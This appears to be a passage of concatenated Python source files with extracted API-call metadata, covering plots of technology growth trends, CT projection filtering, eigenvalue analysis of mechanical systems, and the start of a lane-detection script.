        """Scatter the data on a log y-axis and return the matplotlib figure.

        Parameters
        ----------
        trendfit : bool
            Overlay the fitted exponential trend line.
        title : bool
            Annotate the axes with the annual growth percentage.
        """
        self.fig = plt.figure(figsize=(8, 5))
        self.ax = plt.subplot(111)
        self.ax.set_yscale("log")
        self.ax.scatter(self.xdata,
                        self.ydata,
                        facecolor=RED,
                        s=70,
                        linewidth=1,
                        edgecolor='black')
        # Show labels next to the data points
        if self.labelcolumn:
            labels = self.table[self.labelcolumn]
            for i in range(len(labels)):
                plt.text(self.xdata[i] + 0.6, self.ydata[i], labels[i],
                         ha="left",
                         va="center",
                         fontsize=16,
                         backgroundcolor="#f6f6f6")
        if trendfit:
            self.ax.plot(self.xdata, 10**np.polyval(self.trendfit(), self.xdata),
                         color=BLUE, lw=2, alpha=0.5, zorder=-10)
        if title:
            # Cranial capacity grows by a tiny fraction per year, so it
            # needs more decimal places than the technology datasets.
            if 'ranial' in self.ylabel:
                annual_fmt = "+{:.5f}% per year"
            else:
                annual_fmt = "+{:.0f}% per year"
            self.ax.text(0.05, 0.95,
                         annual_fmt.format(self.get_annual_increase()),
                         va='top',
                         ha='left',
                         transform=self.ax.transAxes,
                         fontsize=18)
        self.ax.set_xlabel(self.xlabel, fontsize=18)
        self.ax.set_ylabel(self.ylabel, fontsize=18)
        if self.xlim:
            self.ax.set_xlim(self.xlim)
        if self.ylim:
            self.ax.set_ylim(self.ylim)
        self.ax.xaxis.set_major_formatter(ticker.FormatStrFormatter('%.0f'))
        # Aesthetics
        self.ax.spines["right"].set_visible(False)
        self.ax.spines["top"].set_visible(False)
        self.ax.get_xaxis().tick_bottom()
        self.ax.get_yaxis().tick_left()
        self.fig.tight_layout()
        return self.fig

    def get_doubling_time(self):
        """Returns number of months it takes for the y-axis data to double."""
        return 12 * np.log10(2) / self.trendfit()[0]

    def get_doubling_text(self):
        """Human-readable doubling time."""
        return "double every {:.0f} months".format(self.get_doubling_time())

    def get_annual_increase(self):
        """Returns the percentage increase per year."""
        annual_fractional_increase = 100 * (10**self.trendfit()[0]) - 100
        log.info("{0} increases by {1:.2f} percent each year".format(self.prefix, annual_fractional_increase))
        return annual_fractional_increase

    def get_prediction(self):
        """Returns the factor of increase between 2000 and 2022."""
        predict = 10**np.polyval(self.trendfit(), [2000, 2022])
        increase = predict[1] / predict[0]
        return "{0}: increased {1:.0f}x between 2000 and 2022".format(self.prefix, increase)
class TransistorCountData(DataSet):
    """CPU transistor counts over time (Moore's law)."""
    title = "CPU transistor counts"
    prefix = "transistor-counts"
    xcolumn = "year"
    xlabel = "Year"
    ycolumn = "transistors"
    ylabel = "Transistors"
    xlim = [1965, 2020]

    def plot(self, **kwargs):
        """Default plot plus an annotation marking the multi-core era."""
        super(TransistorCountData, self).plot(**kwargs)
        # Annotate the era of multi-core processors
        self.ax.plot([2006, 2018], [5e6, 5e6], lw=2.5, color='black')
        self.ax.text(2012, 1.7e6, "Multi-core era", fontsize=15, ha="center")
        return self.fig
class DiskDrivePriceData(DataSet):
    """Hard-drive capacity obtainable per dollar over time."""
    title = "Storage per dollar ratios"
    prefix = "disk-drive-price"
    xcolumn = "year"
    xlabel = "Year"
    ycolumn = "size_mb"
    ylabel = "MB per dollar"
    xlim = [1999, 2019]

    def __init__(self):
        super(DiskDrivePriceData, self).__init__()
        # Plot capacity per dollar rather than the raw size column.
        self.ydata = self.table['size_mb'] / self.table['cost_usd']
class SupercomputerSpeedData(DataSet):
    """Speed of the world's fastest supercomputer by year."""
    title = "Supercomputer speeds"
    prefix = "fastest-supercomputer"
    xcolumn = "year"
    xlabel = "Year"
    ycolumn = "flops"
    ylabel = "FLOPS"
    xlim = [1991, 2018]
class ResearchInternetSpeedData(DataSet):
    """Research-network internet speeds over time."""
    title = "Internet speeds"
    prefix = "research-internet-speed"
    xcolumn = "year"
    xlabel = "Year"
    ycolumn = "bps"
    ylabel = "Bits/s"
class StorageBusSpeedData(DataSet):
    """Throughput of storage bus standards, labeled per point."""
    title = "Storage bus speeds"
    prefix = "storage-bus-speed"
    xcolumn = "year"
    xlabel = "Year"
    ycolumn = "bps"
    ylabel = "Bits/s"
    labelcolumn = "name"
    xlim = [1980, 2020]
class TelescopePixelCountsData(DataSet):
    """Pixels read out per second by large optical survey cameras."""
    title = "Pixel rates of large optical surveys"
    prefix = "telescope-pixel-counts"
    xcolumn = "year"
    xlabel = "Start of science"
    ycolumn = "pixels"
    ylabel = "Pixels/s"
    labelcolumn = "name"
    xlim = [1998, 2026]

    def __init__(self):
        super(TelescopePixelCountsData, self).__init__()
        # Pixel rate = pixels per exposure divided by the exposure cadence.
        self.ydata = self.table['pixels'] / self.table['cycle_time']
class TelescopePixelCountsInfraredData(DataSet):
    """Pixels read out per second by near-infrared survey cameras."""
    title = "Pixel rates of near-infrared surveys"
    prefix = "telescope-pixel-counts-near-infrared"
    xcolumn = "year"
    xlabel = "Start of science"
    ycolumn = "pixels"
    ylabel = "Pixels/s"
    labelcolumn = "name"
    #xlim = [1998, 2025]

    def __init__(self):
        super(TelescopePixelCountsInfraredData, self).__init__()
        # Pixel rate = pixels per exposure divided by the exposure cadence.
        self.ydata = self.table['pixels'] / self.table['cycle_time']
class SpacePhotometryData(DataSet):
    """Pixel rates of NASA's space photometry missions, labeled per point."""
    title = "Pixel rates of NASA's photometry missions"
    prefix = "space-photometry-missions"
    xcolumn = "year"
    xlabel = "Launch"
    ycolumn = "pixels_per_second"
    ylabel = "Pixels/s"
    labelcolumn = "name"
    xlim = [2006, 2029]
class IAUMembers(DataSet):
    """Membership count of the International Astronomical Union."""
    title = "Number of IAU members"
    prefix = "iau-members"
    xcolumn = "year"
    xlabel = "Year"
    ycolumn = "iau_members"
    ylabel = "Number of IAU Members"
class CranialCapacityData(DataSet):
    """Hominid cranial capacity; x-axis is in millions of years."""
    title = "The cranial capacity of humans"
    prefix = "cranial-capacity"
    xcolumn = "year"
    xlabel = "Million years BC"
    ycolumn = "brain_cc"
    ylabel = "Cranial capacity [cm³]"
    xlim = [-3.5, 0.1]

    def __init__(self):
        super(CranialCapacityData, self).__init__()
        # Convert years to millions of years for readability.
        self.xdata = self.table['year'] / 1e6

    def get_doubling_time(self):
        """Returns the doubling time in x-axis units (millions of years)."""
        doubling_time = np.log10(2) / self.trendfit()[0]
        return doubling_time

    def get_doubling_text(self):
        return "doubles every {:.1f} million years".format(self.get_doubling_time())

    def get_annual_increase(self):
        """Returns the percentage increase per year."""
        annual_fractional_increase = 100 * (10**self.trendfit()[0]) - 100
        # x-axis is in Myr, so scale the per-Myr rate down to per-year.
        # NOTE(review): linear (non-compounding) approximation.
        annual_fractional_increase = annual_fractional_increase / 1e6
        log.info("{0} increases by {1:.2f} percent each year".format(self.prefix, annual_fractional_increase))
        return annual_fractional_increase
if __name__ == '__main__':
    """Create graphs for all datasets in the repository."""
    DESTINATION_DIR = 'graphs'
    datasets = [
        DiskDrivePriceData(),
        SupercomputerSpeedData(),
        ResearchInternetSpeedData(),
        StorageBusSpeedData(),
        TelescopePixelCountsData(),
        TelescopePixelCountsInfraredData(),
        SpacePhotometryData(),
        IAUMembers(),
        TransistorCountData(),
        CranialCapacityData(),
    ]
    for ds in datasets:
        # Write each dataset's graph in both raster and vector form.
        for extension in ('png', 'pdf'):
            output_filename = os.path.join(DESTINATION_DIR,
                                           ds.prefix + '.' + extension)
            log.info("Writing {}".format(output_filename))
            ds.plot(title=True).savefig(output_filename, dpi=200)
        print("{} {}".format(ds.title, ds.get_doubling_text()))
#print(ds.get_prediction()) | [
"pylab.subplot",
"pylab.figure",
"matplotlib.ticker.FormatStrFormatter",
"pylab.text",
"numpy.log10",
"os.path.join",
"astropy.table.Table.read"
] | [((734, 770), 'astropy.table.Table.read', 'Table.read', (['filename'], {'format': '"""ascii"""'}), "(filename, format='ascii')\n", (744, 770), False, 'from astropy.table import Table\n'), ((1062, 1088), 'pylab.figure', 'plt.figure', ([], {'figsize': '(8, 5)'}), '(figsize=(8, 5))\n', (1072, 1088), True, 'import pylab as plt\n'), ((1107, 1123), 'pylab.subplot', 'plt.subplot', (['(111)'], {}), '(111)\n', (1118, 1123), True, 'import pylab as plt\n'), ((658, 714), 'os.path.join', 'os.path.join', (['DATADIR', 'self.prefix', "(self.prefix + '.csv')"], {}), "(DATADIR, self.prefix, self.prefix + '.csv')\n", (670, 714), False, 'import os\n'), ((970, 990), 'numpy.log10', 'np.log10', (['self.ydata'], {}), '(self.ydata)\n', (978, 990), True, 'import numpy as np\n'), ((3316, 3349), 'matplotlib.ticker.FormatStrFormatter', 'ticker.FormatStrFormatter', (['"""%.0f"""'], {}), "('%.0f')\n", (3341, 3349), True, 'import matplotlib.ticker as ticker\n'), ((8029, 8040), 'numpy.log10', 'np.log10', (['(2)'], {}), '(2)\n', (8037, 8040), True, 'import numpy as np\n'), ((9228, 9286), 'os.path.join', 'os.path.join', (['DESTINATION_DIR', "(ds.prefix + '.' + extension)"], {}), "(DESTINATION_DIR, ds.prefix + '.' + extension)\n", (9240, 9286), False, 'import os\n'), ((1563, 1687), 'pylab.text', 'plt.text', (['(self.xdata[i] + 0.6)', 'self.ydata[i]', 'labels[i]'], {'ha': '"""left"""', 'va': '"""center"""', 'fontsize': '(16)', 'backgroundcolor': '"""#f6f6f6"""'}), "(self.xdata[i] + 0.6, self.ydata[i], labels[i], ha='left', va=\n 'center', fontsize=16, backgroundcolor='#f6f6f6')\n", (1571, 1687), True, 'import pylab as plt\n'), ((3761, 3772), 'numpy.log10', 'np.log10', (['(2)'], {}), '(2)\n', (3769, 3772), True, 'import numpy as np\n')] |
import numpy as np
import math
import scipy.io as scio
from CreateHSP import CreateHSP

# Load the curved-detector cone-beam (FDK) projection data set.
dataFile = './data/FDK_proj_curve.mat'
data = scio.loadmat(dataFile)

ScanR = data['ScanR']    # scan radius (per the .mat key name)
DistD = data['StdDis']   # source-to-detector distance -- presumably; per key name
Radius = data['ObjR']    # object radius -- presumably; per key name
ProjData = data['Proj']  # projection stack, indexed [Y, Z, view] by the loops below
ProjScale = int(data['ProjScale'])  # number of projection views
DecFanAng = data['DecAngle']        # detector fan angle
Dgy = np.array(ProjData, dtype=np.float32)  # float32 working copy of the projections
YL = int(data['YL'])  # number of samples along the detector fan (Y) direction
ZL = int(data['ZL'])  # number of samples along the detector height (Z) direction

# Try to import the offset, otherwise set them as zeros
if data.get('YOffSet'):
    YOffSet = data['YOffSet']
else:
    YOffSet = 0
if data.get('ZOffSet'):
    ZOffSet = data['ZOffSet']
else:
    ZOffSet = 0
DecHeigh = data['DecHeigh']

DeltaUW = DecFanAng/(YL-1)  # angular sample spacing along the fan direction
DeltaU2 = 2*DeltaUW

# Pre-weighting: central finite difference of the projections along the fan
# direction; the two boundary rows are copied from their neighbours.
for Yindex in range(1, YL-1):
    Dgy[Yindex,:,:]=(ProjData[Yindex+1,:,:]-ProjData[Yindex-1,:,:])/DeltaU2
Dgy[0,:,:] = Dgy[1,:,:]
Dgy[YL-1,:,:]= Dgy[YL-2,:,:]
Dg=Dgy  # NOTE: alias -- Dg and Dgy are the same array object

# Filtering: build a purely imaginary frequency-domain kernel of length 2*nn,
# where nn is the next power of two above YL (zero-padding avoids wrap-around).
WindowType=1
nn=int(math.pow(2,(math.ceil(math.log2(abs(YL)))+1)))
HS=CreateHSP(nn,WindowType)
nn2= nn*2
k = int(nn/2)
TempF=np.zeros(nn2)
TempF[0:k]=HS[k:nn]       # swap the two kernel halves into the padded buffer
TempF[k+nn:nn2]=HS[0:k]
HS=TempF*complex(0,1)     # make the kernel purely imaginary
FFT_F=np.fft.fft(HS)

GF=Dg  # alias of Dg/Dgy: writes below update Dgy in place
for ProjIndex in range(0,ProjScale):
    for j in range(ZL):
        # Copy one detector column before filtering; all reads of this
        # column finish before the aliased write-back below touches it.
        TempData=np.ones(YL)
        for k in range(YL):
            TempData[k]=Dg[k,j,ProjIndex]
        FFT_S=np.fft.fft(TempData,nn2)
        TempData=np.fft.ifft(FFT_S*FFT_F).imag  # keep the imaginary part only
        for k in range(YL):
            GF[k,j,ProjIndex]=-TempData[k]

# Persist the filtered projections (Dgy holds them via the GF alias) together
# with the acquisition geometry for the subsequent back-projection step.
dataNew = './data/FDK_Filtering_curve.mat'
scio.savemat(dataNew,
             {'GF': Dgy,
              'ScanR': ScanR,
              'DistD': DistD,
              'DecFanAng': DecFanAng,
              'ProjScale': ProjScale,
              'YL': YL,
              'YOffSet': YOffSet,
              'DecHeigh': DecHeigh,
              'ZL': ZL,
              'ZOffSet':ZOffSet,
              'Radius': Radius,},
             )
| [
"numpy.fft.ifft",
"scipy.io.loadmat",
"numpy.fft.fft",
"numpy.zeros",
"CreateHSP.CreateHSP",
"scipy.io.savemat",
"numpy.ones",
"numpy.array"
] | [((135, 157), 'scipy.io.loadmat', 'scio.loadmat', (['dataFile'], {}), '(dataFile)\n', (147, 157), True, 'import scipy.io as scio\n'), ((320, 356), 'numpy.array', 'np.array', (['ProjData'], {'dtype': 'np.float32'}), '(ProjData, dtype=np.float32)\n', (328, 356), True, 'import numpy as np\n'), ((954, 979), 'CreateHSP.CreateHSP', 'CreateHSP', (['nn', 'WindowType'], {}), '(nn, WindowType)\n', (963, 979), False, 'from CreateHSP import CreateHSP\n'), ((1009, 1022), 'numpy.zeros', 'np.zeros', (['nn2'], {}), '(nn2)\n', (1017, 1022), True, 'import numpy as np\n'), ((1095, 1109), 'numpy.fft.fft', 'np.fft.fft', (['HS'], {}), '(HS)\n', (1105, 1109), True, 'import numpy as np\n'), ((1468, 1694), 'scipy.io.savemat', 'scio.savemat', (['dataNew', "{'GF': Dgy, 'ScanR': ScanR, 'DistD': DistD, 'DecFanAng': DecFanAng,\n 'ProjScale': ProjScale, 'YL': YL, 'YOffSet': YOffSet, 'DecHeigh':\n DecHeigh, 'ZL': ZL, 'ZOffSet': ZOffSet, 'Radius': Radius}"], {}), "(dataNew, {'GF': Dgy, 'ScanR': ScanR, 'DistD': DistD,\n 'DecFanAng': DecFanAng, 'ProjScale': ProjScale, 'YL': YL, 'YOffSet':\n YOffSet, 'DecHeigh': DecHeigh, 'ZL': ZL, 'ZOffSet': ZOffSet, 'Radius':\n Radius})\n", (1480, 1694), True, 'import scipy.io as scio\n'), ((1195, 1206), 'numpy.ones', 'np.ones', (['YL'], {}), '(YL)\n', (1202, 1206), True, 'import numpy as np\n'), ((1286, 1311), 'numpy.fft.fft', 'np.fft.fft', (['TempData', 'nn2'], {}), '(TempData, nn2)\n', (1296, 1311), True, 'import numpy as np\n'), ((1327, 1353), 'numpy.fft.ifft', 'np.fft.ifft', (['(FFT_S * FFT_F)'], {}), '(FFT_S * FFT_F)\n', (1338, 1353), True, 'import numpy as np\n')] |
"""
Eigenvalue analyses tools for mechnical system:
mass matrix M, stiffness matrix K and possibly damping matrix C
"""
import pandas as pd
import numpy as np
from scipy import linalg
def polyeig(*A):
    """Solve the polynomial eigenvalue problem

        (A0 + e*A1 + ... + e**p * Ap) x = 0

    via companion linearisation to a generalised eigenvalue problem.

    Parameters
    ----------
    *A : square ndarrays A0..Ap, all of identical shape (n, n).

    Returns
    -------
    X : (n, n*p) ndarray
        Column eigenvectors, each scaled by its maximum-magnitude entry.
    e : (n*p,) ndarray
        Eigenvalues; returned real when all of them are real.

    A damped second-order system (K + C e + M e**2) x = 0 is solved with
    ``X, e = polyeig(K, C, M)``.
    """
    if len(A) <= 0:
        raise Exception('Provide at least one matrix')
    shape0 = A[0].shape
    for Ai in A:
        if Ai.shape[0] != Ai.shape[1]:
            raise Exception('Matrices must be square')
        if Ai.shape != shape0:
            raise Exception('All matrices must have the same shapes')

    n = shape0[0]
    p = len(A) - 1  # polynomial degree

    # Companion pencil: solve C z = e D z with z = [x, e*x, ..., e**(p-1)*x].
    C = np.block([
        [np.zeros((n * (p - 1), n)), np.eye(n * (p - 1))],
        [-np.column_stack(A[0:-1])],
    ])
    D = np.block([
        [np.eye(n * (p - 1)), np.zeros((n * (p - 1), n))],
        [np.zeros((n, n * (p - 1))), A[-1]],
    ])
    e, X = linalg.eig(C, D)
    if np.all(np.isreal(e)):
        e = np.real(e)
    # Keep only the physical (first) block of the stacked eigenvectors.
    X = X[:n, :]
    # Scale each mode by its maximum-magnitude component.
    X /= np.tile(np.max(np.abs(X), axis=0), (n, 1))
    return X, e
def eig(K, M=None, freq_out=False, sort=True):
    """Eigenvalue analysis mirroring MATLAB's ``eig`` conventions.

    Parameters
    ----------
    K : (n, n) ndarray
        Stiffness matrix.
    M : (n, n) ndarray, optional
        Mass matrix; when given, the generalised problem K q = lambda M q is
        solved and the eigenvectors are mass-normalised.
    freq_out : bool
        When True (and ``sort``), return frequencies [Hz] instead of Lambda.
    sort : bool
        Sort modes by ascending eigenvalue.

    Returns
    -------
    Q : matrix of column eigenvectors.
    Lambda : diagonal eigenvalue matrix, or an array of frequencies [Hz]
        when ``freq_out`` is True (frequency = sqrt(lambda) / (2*pi)).
    """
    if M is None:
        D, Q = linalg.eig(K)
    else:
        D, Q = linalg.eig(K, M)
        # Mass-normalise each eigenvector. TODO: this loop could be vectorised.
        for j in range(M.shape[1]):
            q_j = Q[:, j]
            modalmass_j = np.dot(q_j.T, M).dot(q_j)
            Q[:, j] = Q[:, j] / np.sqrt(modalmass_j)

    Lambda = np.dot(Q.T, K).dot(Q)
    lambdaDiag = np.diag(Lambda)  # off-diagonal terms may remain due to numerics
    order = np.argsort(lambdaDiag)
    if sort:
        Q = Q[:, order]
        lambdaDiag = lambdaDiag[order]
        if freq_out:
            Lambda = np.sqrt(lambdaDiag) / (2 * np.pi)  # frequencies [Hz]
        else:
            Lambda = np.diag(lambdaDiag)  # enforce a purely diagonal matrix
    else:
        Lambda = np.diag(D)
    return Q, Lambda
def eigA(A, nq=None, nq1=None, fullEV=False):
    """
    Eigenvalue analysis of a "state" matrix A whose states are assumed to
    be ordered {q, q_dot, q1}: nq second-order states (with derivatives)
    followed by nq1 first-order states.

    INPUTS:
      - A : square state matrix
      - nq: number of second order states, optional, relevant if fullEV is False
      - nq1: number of first order states, optional, relevant if fullEV is False
      - fullEV: if True, the entire eigenvectors are returned; otherwise only
        the parts associated with q and q1 are kept.
    OUTPUTS:
      - freq_d: damped frequencies [Hz]
      - zeta  : damping ratios [-]
      - Q     : column eigenvectors
      - freq_0: natural frequencies [Hz]
    """
    n, m = A.shape
    if m != n:
        raise Exception('Matrix needs to be squared')
    if nq is None:
        nq1 = 0 if nq1 is None else nq1
        nq = int((n - nq1) / 2)
    else:
        nq1 = n - 2 * nq
    if n != 2 * nq + nq1 or nq1 < 0:
        raise Exception('Number of 1st and second order dofs should match the matrix shape (n= 2*nq + nq1')

    Q, Lambda = eig(A, sort=False)
    v = np.diag(Lambda)
    if not fullEV:
        # Drop the q_dot rows, keeping only the {q, q1} components.
        Q = np.delete(Q, slice(nq, 2 * nq), axis=0)
    # Keep eigenvalues with positive imaginary part (one per conjugate pair).
    keep = np.imag(v) > 0
    Q = Q[:, keep]
    v = v[keep]

    # Frequencies and damping derived from the complex eigenvalues.
    omega_0 = np.abs(v)                  # natural cyclic frequency [rad/s]
    freq_d = np.imag(v) / (2 * np.pi)   # damped frequency [Hz]
    zeta = -np.real(v) / omega_0        # damping ratio [-]
    freq_0 = omega_0 / (2 * np.pi)      # natural frequency [Hz]

    # Sort all outputs by ascending natural frequency.
    order = np.argsort(freq_0)
    return freq_d[order], zeta[order], Q[:, order], freq_0[order]
def eigMCK(M, C, K, method='diag_beta'):
    """Modal analysis of the second-order system M x'' + C x' + K x = 0.

    method='diag_beta'  : assumes Rayleigh-type damping (a diagonal modal
                          damping matrix) built from K, M and C.
    method='full_matrix': solves the quadratic eigenvalue problem directly.

    Returns (freq_d, zeta, Q, freq, xi): damped and undamped frequencies [Hz],
    damping ratios, column eigenvectors, and pseudo log-decrements.
    """
    if method.lower() == 'diag_beta':
        # Scaled eigenvectors of (K, M); no sorting yet -- order matters below.
        Q, Lambda = eig(K, M, sort=False)
        freq = np.sqrt(np.diag(Lambda)) / (2 * np.pi)
        betaMat = np.dot(Q, C).dot(Q.T)
        xi = np.diag(betaMat) * np.pi / (2 * np.pi * freq)
        xi[xi > 2 * np.pi] = np.NAN  # flag non-physical damping values
        zeta = xi / (2 * np.pi)
        freq_d = freq * np.sqrt(1 - zeta ** 2)
        # Sort everything by ascending damped frequency.
        order = np.argsort(freq_d)
        freq = freq[order]
        freq_d = freq_d[order]
        zeta = zeta[order]
        xi = xi[order]
        Q = Q[:, order]
    elif method.lower() == 'full_matrix':
        # Quadratic eigenvalue problem (K + C e + M e^2) x = 0.
        Q, e = polyeig(K, C, M)
        zeta = -np.real(e) / np.abs(e)
        freq_d = np.imag(e) / (2 * np.pi)
        order = np.argsort(freq_d)
        freq_d = freq_d[order]
        zeta = zeta[order]
        Q = Q[:, order]
        # Keep positive frequencies only (one per conjugate pair).
        keep = freq_d > 1e-08
        freq_d = freq_d[keep]
        zeta = zeta[keep]
        Q = Q[:, keep]
        # Undamped frequency and pseudo log-decrement.
        freq = freq_d / np.sqrt(1 - zeta ** 2)
        xi = 2 * np.pi * zeta
    else:
        raise NotImplementedError()
    return freq_d, zeta, Q, freq, xi
if __name__ == '__main__':
    np.set_printoptions(linewidth=300, precision=4)

    # --- Two-DOF system with Rayleigh-type damping ---------------------------
    nDOF = 2
    M = np.zeros((nDOF, nDOF))
    K = np.zeros((nDOF, nDOF))
    C = np.zeros((nDOF, nDOF))
    M[0, 0] = 430000
    M[1, 1] = 42000000
    C[0, 0] = 7255
    C[1, 1] = M[1, 1] * 0.001
    K[0, 0] = 2700000.0
    K[1, 1] = 200000000.0
    freq_d, zeta, Q, freq, xi = eigMCK(M, C, K)
    print(freq_d)
    print(Q)

    # --- Four-DOF polynomial eigenvalue example ------------------------------
    M = np.diag([3, 1, 3, 1])
    C = np.array([[0.4, 0, -0.3, 0], [0, 0, 0, 0], [-0.3, 0, 0.5, -0.2], [0, 0, -0.2, 0.2]])
    K = np.array([[-7, 2, 4, 0], [2, -4, 2, 0], [4, 2, -9, 3], [0, 0, 3, -3]])
    X, e = polyeig(K, C, M)
    print('X:\n', X)
    print('e:\n', e)
    # Verify that the first eigenpair satisfies the eigenvalue problem.
    s = e[0]
    x = X[:, 0]
    res = (M * s ** 2 + C * s + K).dot(x)  # residuals
    assert np.all(np.abs(res) < 1e-12)
| [
"numpy.set_printoptions",
"numpy.abs",
"numpy.isreal",
"numpy.eye",
"numpy.zeros",
"scipy.linalg.eig",
"numpy.argsort",
"numpy.imag",
"numpy.array",
"numpy.real",
"numpy.column_stack",
"numpy.dot",
"numpy.diag",
"numpy.sqrt"
] | [((1229, 1245), 'scipy.linalg.eig', 'linalg.eig', (['C', 'D'], {}), '(C, D)\n', (1239, 1245), False, 'from scipy import linalg\n'), ((3822, 3837), 'numpy.diag', 'np.diag', (['Lambda'], {}), '(Lambda)\n', (3829, 3837), True, 'import numpy as np\n'), ((4107, 4116), 'numpy.abs', 'np.abs', (['v'], {}), '(v)\n', (4113, 4116), True, 'import numpy as np\n'), ((4363, 4381), 'numpy.argsort', 'np.argsort', (['freq_0'], {}), '(freq_0)\n', (4373, 4381), True, 'import numpy as np\n'), ((6110, 6157), 'numpy.set_printoptions', 'np.set_printoptions', ([], {'linewidth': '(300)', 'precision': '(4)'}), '(linewidth=300, precision=4)\n', (6129, 6157), True, 'import numpy as np\n'), ((6186, 6208), 'numpy.zeros', 'np.zeros', (['(nDOF, nDOF)'], {}), '((nDOF, nDOF))\n', (6194, 6208), True, 'import numpy as np\n'), ((6221, 6243), 'numpy.zeros', 'np.zeros', (['(nDOF, nDOF)'], {}), '((nDOF, nDOF))\n', (6229, 6243), True, 'import numpy as np\n'), ((6256, 6278), 'numpy.zeros', 'np.zeros', (['(nDOF, nDOF)'], {}), '((nDOF, nDOF))\n', (6264, 6278), True, 'import numpy as np\n'), ((6563, 6584), 'numpy.diag', 'np.diag', (['[3, 1, 3, 1]'], {}), '([3, 1, 3, 1])\n', (6570, 6584), True, 'import numpy as np\n'), ((6590, 6679), 'numpy.array', 'np.array', (['[[0.4, 0, -0.3, 0], [0, 0, 0, 0], [-0.3, 0, 0.5, -0.2], [0, 0, -0.2, 0.2]]'], {}), '([[0.4, 0, -0.3, 0], [0, 0, 0, 0], [-0.3, 0, 0.5, -0.2], [0, 0, -\n 0.2, 0.2]])\n', (6598, 6679), True, 'import numpy as np\n'), ((6701, 6771), 'numpy.array', 'np.array', (['[[-7, 2, 4, 0], [2, -4, 2, 0], [4, 2, -9, 3], [0, 0, 3, -3]]'], {}), '([[-7, 2, 4, 0], [2, -4, 2, 0], [4, 2, -9, 3], [0, 0, 3, -3]])\n', (6709, 6771), True, 'import numpy as np\n'), ((1261, 1273), 'numpy.isreal', 'np.isreal', (['e'], {}), '(e)\n', (1270, 1273), True, 'import numpy as np\n'), ((1286, 1296), 'numpy.real', 'np.real', (['e'], {}), '(e)\n', (1293, 1296), True, 'import numpy as np\n'), ((1881, 1897), 'scipy.linalg.eig', 'linalg.eig', (['K', 'M'], {}), '(K, M)\n', (1891, 1897), False, 
'from scipy import linalg\n'), ((1921, 1934), 'scipy.linalg.eig', 'linalg.eig', (['K'], {}), '(K)\n', (1931, 1934), False, 'from scipy import linalg\n'), ((2223, 2238), 'numpy.diag', 'np.diag', (['Lambda'], {}), '(Lambda)\n', (2230, 2238), True, 'import numpy as np\n'), ((2312, 2334), 'numpy.argsort', 'np.argsort', (['lambdaDiag'], {}), '(lambdaDiag)\n', (2322, 2334), True, 'import numpy as np\n'), ((2655, 2665), 'numpy.diag', 'np.diag', (['D'], {}), '(D)\n', (2662, 2665), True, 'import numpy as np\n'), ((3986, 3996), 'numpy.imag', 'np.imag', (['v'], {}), '(v)\n', (3993, 3996), True, 'import numpy as np\n'), ((4178, 4188), 'numpy.imag', 'np.imag', (['v'], {}), '(v)\n', (4185, 4188), True, 'import numpy as np\n'), ((5082, 5100), 'numpy.argsort', 'np.argsort', (['freq_d'], {}), '(freq_d)\n', (5092, 5100), True, 'import numpy as np\n'), ((1445, 1454), 'numpy.abs', 'np.abs', (['X'], {}), '(X)\n', (1451, 1454), True, 'import numpy as np\n'), ((2580, 2599), 'numpy.diag', 'np.diag', (['lambdaDiag'], {}), '(lambdaDiag)\n', (2587, 2599), True, 'import numpy as np\n'), ((4241, 4251), 'numpy.real', 'np.real', (['v'], {}), '(v)\n', (4248, 4251), True, 'import numpy as np\n'), ((5028, 5050), 'numpy.sqrt', 'np.sqrt', (['(1 - zeta ** 2)'], {}), '(1 - zeta ** 2)\n', (5035, 5050), True, 'import numpy as np\n'), ((5543, 5561), 'numpy.argsort', 'np.argsort', (['freq_d'], {}), '(freq_d)\n', (5553, 5561), True, 'import numpy as np\n'), ((7037, 7048), 'numpy.abs', 'np.abs', (['res'], {}), '(res)\n', (7043, 7048), True, 'import numpy as np\n'), ((954, 980), 'numpy.zeros', 'np.zeros', (['(n * (l - 1), n)'], {}), '((n * (l - 1), n))\n', (962, 980), True, 'import numpy as np\n'), ((977, 996), 'numpy.eye', 'np.eye', (['(n * (l - 1))'], {}), '(n * (l - 1))\n', (983, 996), True, 'import numpy as np\n'), ((1071, 1090), 'numpy.eye', 'np.eye', (['(n * (l - 1))'], {}), '(n * (l - 1))\n', (1077, 1090), True, 'import numpy as np\n'), ((1088, 1114), 'numpy.zeros', 'np.zeros', (['(n * (l - 1), n)'], 
{}), '((n * (l - 1), n))\n', (1096, 1114), True, 'import numpy as np\n'), ((1122, 1148), 'numpy.zeros', 'np.zeros', (['(n, n * (l - 1))'], {}), '((n, n * (l - 1)))\n', (1130, 1148), True, 'import numpy as np\n'), ((2147, 2167), 'numpy.sqrt', 'np.sqrt', (['modalmass_j'], {}), '(modalmass_j)\n', (2154, 2167), True, 'import numpy as np\n'), ((2183, 2197), 'numpy.dot', 'np.dot', (['Q.T', 'K'], {}), '(Q.T, K)\n', (2189, 2197), True, 'import numpy as np\n'), ((2496, 2515), 'numpy.sqrt', 'np.sqrt', (['lambdaDiag'], {}), '(lambdaDiag)\n', (2503, 2515), True, 'import numpy as np\n'), ((4802, 4817), 'numpy.diag', 'np.diag', (['Lambda'], {}), '(Lambda)\n', (4809, 4817), True, 'import numpy as np\n'), ((4851, 4863), 'numpy.dot', 'np.dot', (['Q', 'C'], {}), '(Q, C)\n', (4857, 4863), True, 'import numpy as np\n'), ((4895, 4911), 'numpy.diag', 'np.diag', (['betaMat'], {}), '(betaMat)\n', (4902, 4911), True, 'import numpy as np\n'), ((5463, 5472), 'numpy.abs', 'np.abs', (['e'], {}), '(e)\n', (5469, 5472), True, 'import numpy as np\n'), ((5490, 5500), 'numpy.imag', 'np.imag', (['e'], {}), '(e)\n', (5497, 5500), True, 'import numpy as np\n'), ((5877, 5899), 'numpy.sqrt', 'np.sqrt', (['(1 - zeta ** 2)'], {}), '(1 - zeta ** 2)\n', (5884, 5899), True, 'import numpy as np\n'), ((1005, 1029), 'numpy.column_stack', 'np.column_stack', (['A[0:-1]'], {}), '(A[0:-1])\n', (1020, 1029), True, 'import numpy as np\n'), ((2095, 2111), 'numpy.dot', 'np.dot', (['q_j.T', 'M'], {}), '(q_j.T, M)\n', (2101, 2111), True, 'import numpy as np\n'), ((5450, 5460), 'numpy.real', 'np.real', (['e'], {}), '(e)\n', (5457, 5460), True, 'import numpy as np\n')] |
import numpy as np
# from ..lane_detection.lane_detector import LaneDetector
# from ..lane_detection.camera_geometry import CameraGeometry
import sys
sys.path.append('../../code')
from solutions.lane_detection.lane_detector import LaneDetector
from solutions.lane_detection.camera_geometry import CameraGeometry
def get_intersection(line1, line2):
    """Return the (x, y) intersection of two lines given as (slope, intercept)
    pairs.  Undefined (division by zero) for parallel lines."""
